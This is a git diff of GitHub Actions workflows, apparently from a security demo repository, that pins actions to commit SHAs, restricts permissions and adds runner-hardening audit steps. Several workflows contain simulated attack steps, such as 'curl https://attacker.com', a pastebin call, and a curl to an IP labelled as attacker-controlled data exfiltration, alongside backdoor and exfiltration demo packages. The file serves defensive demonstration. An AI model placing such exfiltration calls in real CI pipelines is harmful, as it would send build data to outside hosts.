diff --git a/.github/workflows/PRTargetWorkflow.yml b/.github/workflows/PRTargetWorkflow.yml index 8bf0debd..dc670997 100644 --- a/.github/workflows/PRTargetWorkflow.yml +++ b/.github/workflows/PRTargetWorkflow.yml @@ -7,13 +7,22 @@ on: - synchronize - reopened +permissions: {} + jobs: pr-target-check: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - name: Check out code - uses: actions/checkout@v4 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - name: Wait for 2 minutes run: sleep 120 diff --git a/.github/workflows/anomalous-outbound-calls.yaml b/.github/workflows/anomalous-outbound-calls.yaml index 2e87a976..1d42876f 100644 --- a/.github/workflows/anomalous-outbound-calls.yaml +++ b/.github/workflows/anomalous-outbound-calls.yaml @@ -1,13 +1,17 @@ name: Anomalous Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: AnomalousOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - run: "curl https://pastebin.com -L || true" diff --git a/.github/workflows/arc-codecov-simulation.yml b/.github/workflows/arc-codecov-simulation.yml index dd1ab7dc..326f0353 100644 --- a/.github/workflows/arc-codecov-simulation.yml +++ b/.github/workflows/arc-codecov-simulation.yml @@ -7,7 +7,7 @@ jobs: runs-on: self-hosted steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: > @@ -19,8 +19,8 @@ jobs: nodejs.org:443 production.cloudflare.docker.com:443 registry.npmjs.org:443 - - uses: actions/checkout@v3 - - uses: actions/setup-node@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1 with: node-version: 18 - name: npm install @@ -28,7 +28,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-secure-by-default.yml b/.github/workflows/arc-secure-by-default.yml index 96a7098d..eb98db3a 100644 --- a/.github/workflows/arc-secure-by-default.yml +++ b/.github/workflows/arc-secure-by-default.yml @@ -2,19 +2,35 @@ name: "ARC: Secure-By-Default Cluster-Level Policy" on: workflow_dispatch: +permissions: {} + jobs: direct-ip-hosted: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 # Codecov Scenario: Exfiltrate data to attacker's IP address - name: Data Exfiltration To Attacker Controlled IP address run: curl 104.16.209.12 --connect-timeout 5 direct-ip-arc: + permissions: + contents: read # for actions/checkout to fetch code runs-on: self-hosted steps: - - uses: actions/checkout@v3 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 # Codecov Scenario: Exfiltrate data to attacker's IP address - name: Data Exfiltration To Attacker Controlled IP address diff --git a/.github/workflows/arc-solarwinds-simulation.yml b/.github/workflows/arc-solarwinds-simulation.yml index 72ce7c17..5aee59af 100644 --- a/.github/workflows/arc-solarwinds-simulation.yml +++ b/.github/workflows/arc-solarwinds-simulation.yml @@ -6,8 +6,13 @@ jobs: arc-solarwinds-simulation: runs-on: self-hosted steps: - - uses: actions/checkout@v3 - - uses: actions/setup-node@v3 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1 with: node-version: 18 - name: npm install @@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-zero-effort-observability.yml b/.github/workflows/arc-zero-effort-observability.yml index 5cb8daac..852f6a0c 100644 --- a/.github/workflows/arc-zero-effort-observability.yml +++ b/.github/workflows/arc-zero-effort-observability.yml @@ -6,8 +6,13 @@ jobs: build: runs-on: self-hosted steps: - - uses: actions/checkout@v3 - - uses: actions/setup-node@v3 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1 with: node-version: 18 - name: npm install @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/baseline_checks.yml b/.github/workflows/baseline_checks.yml index 06fc0bc7..73b89298 100644 --- a/.github/workflows/baseline_checks.yml +++ b/.github/workflows/baseline_checks.yml @@ -7,13 +7,13 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@int-sh + - uses: step-security/harden-runner@668ad3cce4bd0191ec8fdd9868adcb7521a9dacd # int-sh with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: npm install run: | @@ -22,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/block-dns-exfiltration.yaml b/.github/workflows/block-dns-exfiltration.yaml index 767d5d98..a110fb0e 100644 --- a/.github/workflows/block-dns-exfiltration.yaml +++ b/.github/workflows/block-dns-exfiltration.yaml @@ -1,20 +1,24 @@ name: Block DNS Exfiltration With Harden-Runner on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code name: Deploy runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: | github.com:443 - name: Code Checkout - uses: actions/checkout@v4 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 # DNS Data Exfiltration - name: DNS Data Exfiltration diff --git a/.github/workflows/changed-files-vulnerability-with-hr.yml b/.github/workflows/changed-files-vulnerability-with-hr.yml index d8ed7379..d8815fe3 100644 --- a/.github/workflows/changed-files-vulnerability-with-hr.yml +++ b/.github/workflows/changed-files-vulnerability-with-hr.yml @@ -15,21 +15,21 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: block allowed-endpoints: > github.com:443 - - uses: actions/checkout@v4 + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 with: fetch-depth: 0 # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/changed-files-vulnerability-without-hr.yml b/.github/workflows/changed-files-vulnerability-without-hr.yml index 4b74464f..b3c52b8a 100644 --- a/.github/workflows/changed-files-vulnerability-without-hr.yml +++ b/.github/workflows/changed-files-vulnerability-without-hr.yml @@ -14,14 +14,19 @@ jobs: runs-on: ubuntu-latest name: Test changed-files steps: - - uses: actions/checkout@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 with: fetch-depth: 0 # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/hosted-file-monitor-with-hr.yml b/.github/workflows/hosted-file-monitor-with-hr.yml index eeb3b63f..5286ca90 100644 --- a/.github/workflows/hosted-file-monitor-with-hr.yml +++ b/.github/workflows/hosted-file-monitor-with-hr.yml @@ -6,24 +6,24 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: npm install run: | cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-file-monitor-without-hr.yml b/.github/workflows/hosted-file-monitor-without-hr.yml index a673fca8..b7abbe90 100644 --- a/.github/workflows/hosted-file-monitor-without-hr.yml +++ b/.github/workflows/hosted-file-monitor-without-hr.yml @@ -6,20 +6,25 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: npm install run: | cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-https-monitoring-hr.yml b/.github/workflows/hosted-https-monitoring-hr.yml index 37988487..e43ef3d1 100644 --- a/.github/workflows/hosted-https-monitoring-hr.yml +++ b/.github/workflows/hosted-https-monitoring-hr.yml @@ -2,17 +2,22 @@ name: "Hosted: HTTPS Monitoring with Harden-Runner" on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for JasonEtco/create-an-issue to read template files + issues: write # for JasonEtco/create-an-issue to create new issues runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - - uses: JasonEtco/create-an-issue@v2 + - uses: JasonEtco/create-an-issue@1b14a70e4d8dc185e5cc76d3bec9eab20257b2c5 # v2.9.2 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/hosted-network-filtering-hr.yml b/.github/workflows/hosted-network-filtering-hr.yml index 7dd7dcbf..cfb92b2a 100644 --- a/.github/workflows/hosted-network-filtering-hr.yml +++ b/.github/workflows/hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: block @@ -17,9 +17,9 @@ jobs: registry.npmjs.org:443 www.githubstatus.com:443 - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: npm install run: | @@ -28,17 +28,17 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-monitoring-hr.yml b/.github/workflows/hosted-network-monitoring-hr.yml index 0aa55477..9c195e17 100644 --- a/.github/workflows/hosted-network-monitoring-hr.yml +++ b/.github/workflows/hosted-network-monitoring-hr.yml @@ -10,9 +10,9 @@ jobs: with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: npm install run: | @@ -21,12 +21,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-without-hr.yml b/.github/workflows/hosted-network-without-hr.yml index 3533b8c7..7a9560d0 100644 --- a/.github/workflows/hosted-network-without-hr.yml +++ b/.github/workflows/hosted-network-without-hr.yml @@ -6,9 +6,14 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: crazy-max/ghaction-github-status@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: npm install run: | @@ -17,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index f4285263..acec0849 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -6,16 +6,16 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: npm install run: | cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/secret-in-build-log.yml b/.github/workflows/secret-in-build-log.yml index 847c1ca1..cb30c19a 100644 --- a/.github/workflows/secret-in-build-log.yml +++ b/.github/workflows/secret-in-build-log.yml @@ -3,15 +3,19 @@ name: Secret in Build Log on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - name: harden-runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit diff --git a/.github/workflows/self-hosted-file-monitor-with-hr.yml b/.github/workflows/self-hosted-file-monitor-with-hr.yml index a5360856..ce86eb64 100644 --- a/.github/workflows/self-hosted-file-monitor-with-hr.yml +++ b/.github/workflows/self-hosted-file-monitor-with-hr.yml @@ -6,8 +6,13 @@ jobs: build: runs-on: [self-hosted, ec2] steps: - - uses: actions/checkout@v3 - - uses: actions/setup-node@v3 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1 with: node-version: 18 - name: npm install @@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-filtering-hr.yml b/.github/workflows/self-hosted-network-filtering-hr.yml index 815f293e..c25439b4 100644 --- a/.github/workflows/self-hosted-network-filtering-hr.yml +++ b/.github/workflows/self-hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: [self-hosted, ec2] steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: > @@ -15,8 +15,8 @@ jobs: ghcr.io:443 github.com:443 registry.npmjs.org:443 - - uses: actions/checkout@v3 - - uses: actions/setup-node@v3 + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1 with: node-version: 18 - name: npm install @@ -24,7 +24,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-monitoring-hr.yml b/.github/workflows/self-hosted-network-monitoring-hr.yml index 5f0ba232..a0482503 100644 --- a/.github/workflows/self-hosted-network-monitoring-hr.yml +++ b/.github/workflows/self-hosted-network-monitoring-hr.yml @@ -6,8 +6,13 @@ jobs: build: runs-on: [self-hosted, ec2] steps: - - uses: actions/checkout@v3 - - uses: actions/setup-node@v3 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1 with: node-version: 18 - name: npm install @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/tj-actions-changed-files-incident.yaml b/.github/workflows/tj-actions-changed-files-incident.yaml index 7426c56f..17b45c95 100644 --- a/.github/workflows/tj-actions-changed-files-incident.yaml +++ b/.github/workflows/tj-actions-changed-files-incident.yaml @@ -14,19 +14,19 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: audit - - uses: actions/checkout@v4 + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 with: fetch-depth: 0 # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v35 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/toc-tou.yml b/.github/workflows/toc-tou.yml index 50ca25cb..a3501771 100644 --- a/.github/workflows/toc-tou.yml +++ b/.github/workflows/toc-tou.yml @@ -15,7 +15,12 @@ jobs: contents: read pull-requests: read steps: - - uses: actions/checkout@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - name: Wait for demo purposes run: | @@ -40,7 +45,12 @@ jobs: contents: read pull-requests: read steps: - - uses: actions/checkout@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - name: Wait for demo purposes run: | @@ -48,7 +58,7 @@ jobs: sleep 120 # SECURE: Gets exactly the code that was approved - - uses: actions/checkout@v4 + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 with: ref: ${{ github.event.pull_request.head.sha }} diff --git a/.github/workflows/unexpected-outbound-calls.yml b/.github/workflows/unexpected-outbound-calls.yml index f5316797..83bba8d0 100644 --- a/.github/workflows/unexpected-outbound-calls.yml +++ b/.github/workflows/unexpected-outbound-calls.yml @@ -1,13 +1,17 @@ name: Unexpected Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: UnexpectedOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - run: "curl https://attacker.com -L || true"